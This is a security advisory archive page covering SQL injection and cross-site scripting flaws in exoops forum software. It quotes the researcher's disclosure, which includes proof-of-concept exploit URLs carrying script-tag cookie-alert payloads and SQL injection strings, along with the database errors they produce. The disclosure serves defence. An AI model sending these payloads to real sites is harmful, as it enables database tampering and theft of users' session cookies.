SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   exoops Vendors:   exoops.info
exoops Input Validation Flaws Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013566
SecurityTracker URL:  http://securitytracker.com/id/1013566
CVE Reference:   CVE-2005-0910, CVE-2005-0911   (Links to External Site)
Updated:  Jul 7 2008
Original Entry Date:  Mar 27 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information, Modification of user information
Exploit Included:  Yes  

Description:   Diabolic Crab reported some input validation vulnerabilities in exoops. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.

Several scripts do not properly validate user-supplied input in certain parameters. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database. Some demonstration exploit URLs are provided:

http://[target]/modules/newbb/index.php?viewcat='SQL_INJECTION

http://[target]/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9

A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the exoops software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/modules/newbb/viewforum.php?sortname=p.post_time&sort
order=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%
3E&forum=25&refresh=Vai

http://[target]/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the exoops software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.exoops.info/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple Sql injection, and multiple XSS vulnerabilities in Easy Community Management System Forum (E-XOOPS)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
 
Severity:  High
Title: Multiple Sql injection, and multiple XSS vulnerabilities in
Easy Community Management System Forum (E-XOOPS)
Date: March  28,  2005
 
Summary:
There are multiple sql injection, xss vulnerabilities in the Easy
Community Management System Forum (E-XOOPS)
Vendor: E-Xoops
Vendor website: www.exoops.info
 
Proof of Concept Exploits:
 
http://localhost/modules/newbb/viewforum.php?sortname=p.post_time&sort
order=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%
3E&forum=25&refresh=Vai
Pops cookie
 

http://localhost/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Eale
rt(document.cookie)%3C/script%3E
Pops cookie
 

http://localhost/modules/newbb/index.php?viewcat='SQL_INJECTION
SQL ERROR AND POSSIBLE INJECTION
Error
 
SELECT f.*, u.uname, u.uid, p.topic_id, p.post_time, p.subject,
p.icon FROM e_xoops_bb_forums f LEFT JOIN e_xoops_bb_posts p ON
p.post_id = f.forum_last_post_id LEFT JOIN e_xoops_users u ON u.uid =
p.uid WHERE f.cat_id = \'SQL_INJECTION ORDER BY f.cat_id,
f.forum_name
 

http://localhost/modules/sections/index.php?op=viewarticle&artid=9%2c+
9%2c+9
SQL ERROR AND POSSIBLE INJECTION
 
Errore Numero: 2 [Attenzione]
Message errore: mysql_fetch_row(): supplied argument is not a valid
MySQL result resource
In File: /var/www/*************/09/class/database/mysql.php
On Line: 151
 
Errore Numero: 2 [Attenzione]
Message errore: mysql_fetch_row(): supplied argument is not a valid
MySQL result resource
In File: /var/www/*************/09/class/database/mysql.php
On Line: 151
 

Possible fix: The usage of htmlspeacialchars(),
mysql_escape_string(), mysql_real_escape_string() and other functions
for input validation before passing user input to the mysql database,
or before echoing data on the screen, would solve these problems.
 
Author:
These vulnerabilties have been found and released by Diabolic Crab,
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free
to contact me regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or
http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come
out book on Secure coding with php.
 
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
 
iQA/AwUBQkbLJCZV5e8av/DUEQJDWACfc/2aBR87DepZ2jVVTok2Pfww1cMAn0J3
HI/E6boKXH3OlGAch+b4z0me
=Yl6f
-----END PGP SIGNATURE-----
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC